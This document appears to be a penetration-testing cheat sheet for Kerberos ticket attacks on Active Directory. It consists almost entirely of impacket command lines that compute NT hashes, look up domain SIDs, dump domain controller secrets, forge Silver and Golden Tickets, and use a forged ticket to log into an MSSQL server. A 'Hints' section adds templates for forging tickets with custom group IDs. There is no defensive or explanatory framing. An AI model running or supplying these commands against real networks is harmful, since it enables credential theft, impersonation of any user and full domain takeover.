Technique
1.0 Ticket Based Attacks
1.1 Silver Ticket
iconv -f ASCII -t UTF-16LE <(printf "$pass") | openssl dgst -md4
impacket-lookupsid '$domain.local/$user:$pass@evergreen' 0
impacket-ticketer -nthash "84a5092...52b93b804" -domain-sid "S-1-5-21-..." -domain "$domain.local" -spn "MSSQLSvc/$server.$domain.local" "$user" -user-id 1119
export KRB5CCNAME=$user.ccache
impacket-mssqlclient '@$server.$domain.local' -k -no-pass -debug -target-ip 172.17.1.22 -windows-auth
1.2 Golden Ticket
impacket-secretsdump '$domain.local/$user:$pass@$dc.$domain.local' -just-dc
impacket-ticketer -aesKey be43fd55ab73801ae4136810d5c9c757 -domain-sid "S-1-5-21-..." -domain "$domain.local" "$user" -user-id 1114
Hints
# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
# Create the golden ticket (with RC4 key, i.e. NT hash)
ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" "randomuser"
# Create the golden ticket (with AES 128/256bits key)
ticketer.py -aesKey "$krbtgtAESkey" -domain-sid "$domainSID" -domain "$DOMAIN" "randomuser"
# Create the golden ticket (with RC4 key, i.e. NT hash) with custom user/groups ids
ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" -user-id "$USERID" -groups "$GROUPID1,$GROUPID2,..." "randomuser"
References